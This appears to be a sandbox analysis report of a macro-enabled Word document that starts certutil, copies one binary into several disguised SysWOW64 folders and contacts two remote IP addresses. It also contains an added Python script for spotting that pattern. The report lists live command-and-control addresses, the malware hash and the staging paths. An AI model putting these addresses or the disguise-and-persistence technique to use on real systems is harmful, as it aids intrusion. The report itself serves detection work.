Application Name: | Microsoft Office Word |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1252 |
Title: | |
Subject: | |
Author: | |
Keywords: | |
Comments: | |
Template: | |
Last Saved By: | |
Revision Number: | 7 |
Total Edit Time: | 1200 |
Create Time: | 2020-05-10 00:31:00 |
Last Saved Time: | 2020-10-28 04:44:00 |
Number of Pages: | 2 |
Number of Words: | 89482 |
Number of Characters: | 510049 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1252 |
Number of Lines: | 4250 |
Number of Paragraphs: | 1196 |
Thumbnail Scaling Desired: | False |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 1048576 |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 3696 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 3696 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . . ' E . . . . . . . . . . . . . . . . . . . ( . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . S l e e p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . |
Data Raw: | 01 16 03 00 00 18 01 00 00 dc 06 00 00 fc 00 00 00 02 02 00 00 ff ff ff ff e3 06 00 00 7b 0b 00 00 00 00 00 00 01 00 00 00 f1 27 45 f5 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 28 00 00 00 00 00 32 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 6c 65 65 70 00 00 00 ff ff ff ff 01 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
#Else |
VB_Name |
VB_Creatable |
".pdf"): |
SetTask(Task |
VB_Exposed |
Null, |
Form_Close() |
("doc"): |
Formt, |
VB_TemplateDerived |
Function |
(ByVal |
String |
Right(Range.Text, |
String) |
Form_Close |
Long) |
Long, |
VB_Customizable |
Task, |
("xls"): |
FileName:=STP |
".xls |
PtrSafe |
Left(ActiveDocument.Paragraphs(One).Range.Text, |
Declare |
"ThisDocument" |
SetTask |
False |
FileFormat:=wdFormatText |
Attribute |
Private |
VB_PredeclaredId |
Sleep |
VB_GlobalNameSpace |
VB_Base |
".pdf,In") |
Document_Close() |
VBA Code |
---|
|
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 114 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 114 |
Entropy: | 4.2359563651 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.25569624217 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.473780805052 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U s e r . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00 |
Stream Path: 1Table, File Type: data, Stream Size: 7386 |
---|
General | |
---|---|
Stream Path: | 1Table |
File Type: | data |
Stream Size: | 7386 |
Entropy: | 5.92077573609 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . |
Data Raw: | 1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 |
Stream Path: Data, File Type: data, Stream Size: 187989 |
---|
General | |
---|---|
Stream Path: | Data |
File Type: | data |
Stream Size: | 187989 |
Entropy: | 7.97862280177 |
Base64 Encoded: | True |
Data ASCII: | U . . . D . d . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N . . . . . . . . . . . . . . . . . . . C . . . * . . . . A . . . . . . . . . . . . . . . . . . . . . . t . e . m . p . l . a . t . e . . . . . . . . . . . . . . . b . . . . . . . . . . . . b r . . . . 7 . a . _ . . . . . . . . . . . . D . . . . . . . . n . . . . . . . . . b r . . . . 7 . a . _ . . . . P N G . . . . . . . . I H D R . . . O . . . . . . . . . 3 0 . u |
Data Raw: | 55 de 02 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 a3 31 e3 1d c3 03 c3 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 4e 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 2a 00 00 00 04 41 01 00 00 00 05 c1 12 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 74 00 65 00 |
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 367 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 367 |
Entropy: | 5.29037636248 |
Base64 Encoded: | True |
Data ASCII: | I D = " { D 4 7 2 8 3 5 A - 3 8 9 1 - 4 D B 9 - 8 6 F 0 - 0 C 1 2 4 A F F D 6 E 1 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 8 0 A E 9 E F E D E F E D E F E D E F E D " . . D P B = " 9 6 9 4 7 7 F B 8 B 0 7 1 8 0 8 1 8 0 8 1 8 " . . G C = " 2 4 2 6 C 5 8 9 D D 1 6 D E 1 6 D E E 9 " . . . . [ H o s t E x t e n d e r I n f o ] |
Data Raw: | 49 44 3d 22 7b 44 34 37 32 38 33 35 41 2d 33 38 39 31 2d 34 44 42 39 2d 38 36 46 30 2d 30 43 31 32 34 41 46 46 44 36 45 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 |
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECTwm |
File Type: | data |
Stream Size: | 41 |
Entropy: | 3.07738448508 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00 |
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2845 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 2845 |
Entropy: | 4.32828178006 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 513 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/dir |
File Type: | data |
Stream Size: | 513 |
Entropy: | 6.25624133358 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . Y { . ` . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . . |
Data Raw: | 01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 59 7b a3 60 0a 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
Stream Path: WordDocument, File Type: data, Stream Size: 627764 |
---|
General | |
---|---|
Stream Path: | WordDocument |
File Type: | data |
Stream Size: | 627764 |
Entropy: | 6.04018774642 |
Base64 Encoded: | False |
Data ASCII: | . . . . { . . . . . . . . . . . . . . . . . . . . . . . . - . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . f . . . f . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | ec a5 c1 00 7b 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 eb 2d 09 00 0e 00 62 6a 62 6a 84 bd 84 bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 34 94 09 00 e6 d7 d5 66 e6 d7 d5 66 eb 25 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 27, 2021 00:19:05.781451941 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:06.090272903 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.090476036 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:06.091706991 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:06.091789961 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:06.399941921 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.400216103 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.400232077 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:06.400314093 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:06.707856894 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.708199978 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.708224058 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.709530115 CEST | 80 | 49172 | 177.130.51.198 | 192.168.2.22 |
May 27, 2021 00:19:06.709599972 CEST | 49172 | 80 | 192.168.2.22 | 177.130.51.198 |
May 27, 2021 00:19:07.067719936 CEST | 49173 | 8080 | 192.168.2.22 | 91.121.87.90 |
May 27, 2021 00:19:07.121426105 CEST | 8080 | 49173 | 91.121.87.90 | 192.168.2.22 |
May 27, 2021 00:19:07.121526957 CEST | 49173 | 8080 | 192.168.2.22 | 91.121.87.90 |
May 27, 2021 00:19:07.122493982 CEST | 49173 | 8080 | 192.168.2.22 | 91.121.87.90 |
May 27, 2021 00:19:07.122662067 CEST | 49173 | 8080 | 192.168.2.22 | 91.121.87.90 |
May 27, 2021 00:19:07.176059008 CEST | 8080 | 49173 | 91.121.87.90 | 192.168.2.22 |
May 27, 2021 00:19:07.176095963 CEST | 8080 | 49173 | 91.121.87.90 | 192.168.2.22 |
May 27, 2021 00:19:07.176537037 CEST | 49173 | 8080 | 192.168.2.22 | 91.121.87.90 |
May 27, 2021 00:19:07.228121042 CEST | 8080 | 49173 | 91.121.87.90 | 192.168.2.22 |
May 27, 2021 00:19:07.228171110 CEST | 8080 | 49173 | 91.121.87.90 | 192.168.2.22 |
May 27, 2021 00:19:07.228199005 CEST | 8080 | 49173 | 91.121.87.90 | 192.168.2.22 |
May 27, 2021 00:19:07.228286028 CEST | 49173 | 8080 | 192.168.2.22 | 91.121.87.90 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49172 | 177.130.51.198 | 80 | C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 27, 2021 00:19:06.091706991 CEST | 11157 | OUT | |
May 27, 2021 00:19:06.091789961 CEST | 11159 | OUT | |
May 27, 2021 00:19:06.400232077 CEST | 11160 | OUT | |
May 27, 2021 00:19:06.400314093 CEST | 11162 | OUT | |
May 27, 2021 00:19:06.709530115 CEST | 11162 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49173 | 91.121.87.90 | 8080 | C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 27, 2021 00:19:07.122493982 CEST | 11163 | OUT | |
May 27, 2021 00:19:07.228199005 CEST | 11168 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 00:16:31 |
Start date: | 27/05/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f120000 |
File size: | 1424032 bytes |
MD5 hash: | 95C38D04597050285A18F66039EDB456 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 00:17:42 |
Start date: | 27/05/2021 |
Path: | C:\Windows\System32\certutil.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffa70000 |
File size: | 1192448 bytes |
MD5 hash: | 4586B77B18FA9A8518AF76CA8FD247D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 00:17:43 |
Start date: | 27/05/2021 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff0e0000 |
File size: | 27136 bytes |
MD5 hash: | C78655BC80301D76ED4FEF1C1EA40A7D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 00:17:56 |
Start date: | 27/05/2021 |
Path: | C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:17:59 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\mfcm140\normaliz.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:01 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\clip\mmcshext.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:03 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\regedt32\ir50_qcx.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:05 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:07 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:09 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\oleaccrc\TSChannel.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:12 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\iprtrmgr\qdvd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 00:18:14 |
Start date: | 27/05/2021 |
Path: | C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 344110 bytes |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Visual Basic |
Yara matches: |
|
Reputation: | low |
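The process list above shows one binary (MD5 E87553AEBAC0BF74D165A87321C629BE, 344110 bytes, Visual Basic) first started from the user's Temp folder and then re-executed from eight different freshly created sub-folders of C:\Windows\SysWOW64, each with a file name borrowed from a legitimate system component. That pattern is easier to hunt for than any single path. The script below is an added example, not part of the sandbox report or its tooling: it parses the Path / MD5 hash lines of the "General" blocks in this section (the twelve entries are copied from the report, trimmed to those two fields) and flags any hash that ran from three or more distinct paths with at least one copy under a SysWOW64 sub-folder, noting whether the first copy lived in a user-writable directory. The thresholds and the "SysWOW64\<dir>\<name>.exe" shape are the author's heuristic, not something the report states.

```python
"""Added example: flag one hash executing from many SysWOW64 sub-folders,
run over the process entries printed in this report's System Behavior section."""
import re
from collections import defaultdict

# Sample input: the twelve process entries from this report, reduced to the
# Path and MD5 hash lines (report data, not invented; order as listed).
SAMPLE_REPORT = r"""
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
MD5 hash: | 95C38D04597050285A18F66039EDB456 |
Path: | C:\Windows\System32\certutil.exe |
MD5 hash: | 4586B77B18FA9A8518AF76CA8FD247D9 |
Path: | C:\Windows\System32\svchost.exe |
MD5 hash: | C78655BC80301D76ED4FEF1C1EA40A7D |
Path: | C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Path: | C:\Windows\SysWOW64\mfcm140\normaliz.exe |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Path: | C:\Windows\SysWOW64\clip\mmcshext.exe |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Path: | C:\Windows\SysWOW64\regedt32\ir50_qcx.exe |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Path: | C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Path: | C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Path: | C:\Windows\SysWOW64\oleaccrc\TSChannel.exe |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Path: | C:\Windows\SysWOW64\iprtrmgr\qdvd.exe |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
Path: | C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe |
MD5 hash: | E87553AEBAC0BF74D165A87321C629BE |
"""

# One "Path:" line immediately followed by its "MD5 hash:" line, as the report prints them.
ENTRY_RE = re.compile(
    r"Path: \| (?P<path>.+?) \|\r?\nMD5 hash: \| (?P<md5>[0-9A-Fa-f]{32}) \|"
)
# Author's heuristic shapes (assumptions, not report fields):
# an .exe one directory level below SysWOW64, and a per-user AppData location.
SYSWOW_SUBDIR_EXE = re.compile(r"^C:\\Windows\\SysWOW64\\[^\\]+\\[^\\]+\.exe$", re.I)
USER_WRITABLE = re.compile(r"^C:\\Users\\[^\\]+\\AppData\\", re.I)


def parse_entries(text):
    """Return (path, MD5) pairs in the order the report lists the processes."""
    return [(m["path"], m["md5"].upper()) for m in ENTRY_RE.finditer(text)]


def find_hash_hopping(entries, min_paths=3):
    """Group paths by hash; flag a hash seen at >= min_paths distinct paths
    when at least one of them is an .exe inside a SysWOW64 sub-folder."""
    paths_by_md5 = defaultdict(list)
    for path, md5 in entries:
        if path not in paths_by_md5[md5]:
            paths_by_md5[md5].append(path)
    findings = []
    for md5, paths in paths_by_md5.items():
        copies = [p for p in paths if SYSWOW_SUBDIR_EXE.match(p)]
        if len(paths) >= min_paths and copies:
            findings.append({
                "md5": md5,
                "first_path": paths[0],                       # where it was staged
                "staged_from_user_dir": bool(USER_WRITABLE.match(paths[0])),
                "syswow64_copies": len(copies),
                "paths": paths,
            })
    return findings


if __name__ == "__main__":
    for f in find_hash_hopping(parse_entries(SAMPLE_REPORT)):
        print(f["md5"], "staged at", f["first_path"],
              "->", f["syswow64_copies"], "SysWOW64 copies")
```

On real telemetry the same logic runs over process-creation events (Sysmon event 1, EDR process tables) keyed on the image hash; the point is that the hash stays constant while the path churns, so a hash-plus-path cardinality check catches the staging even when every individual file name looks like a system DLL.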
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |
9 | #if VBA7 then |
10 | Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal One as Long) as Long |
11 | #else |
12 | Private Declare Function Sleep Lib "Kernel32" (ByVal One as Long) as Long |
13 | #endif |
14 | Private Ms13 |
15 | Private One as String |
16 | Private Two as String |
